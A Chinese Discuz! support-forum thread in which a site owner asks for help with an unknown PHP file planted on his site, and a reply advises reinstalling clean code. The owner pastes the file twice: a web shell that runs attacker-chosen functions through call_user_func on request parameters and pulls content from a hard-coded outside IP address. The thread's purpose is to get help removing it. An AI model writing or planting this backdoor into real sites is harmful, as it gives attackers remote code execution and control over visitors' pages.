Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
12
返回列表 发新帖

[求助] 网站被添加不明文件,求大神指教

[复制链接]
我心枫叶 发表于 2017-1-17 21:46:56 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

 楼主| DZ第一帅哥 发表于 2017-1-19 14:41:12 | 显示全部楼层
hhb121 发表于 2017-1-17 17:48
楼主我看你一点都不着急,连被加载出来php也不愿意贴出来,别人知道是怎么回事。另外,不是服务器问题,不 ...
类似于这样的
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }        
        return $html;
}
?>
回复

使用道具 举报

 楼主| DZ第一帅哥 发表于 2017-1-19 14:42:13 | 显示全部楼层
我心枫叶 发表于 2017-1-17 21:46
着重看下服务器安全和插件这块

类似于这样的文件

代码如下,请问怎么搞

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }       
        return $html;
}
?>

回复

使用道具 举报

hhb121 发表于 2017-1-19 16:20:30 | 显示全部楼层
程序出现漏洞了,当用户浏览页面的时候,返回代码,类似于小偷程序,不知道你网站有什么有价值的东西。 应该是在抓取用户数据。能自己搞就自己搞,上传全新程序,按照升级方式全新覆盖,看看情况,如果自己搞不了,付费支持也可以,Q 861827250  至于原因,这个不好说,没具体看,说不清楚。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-25 23:46 , Processed in 0.020441 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表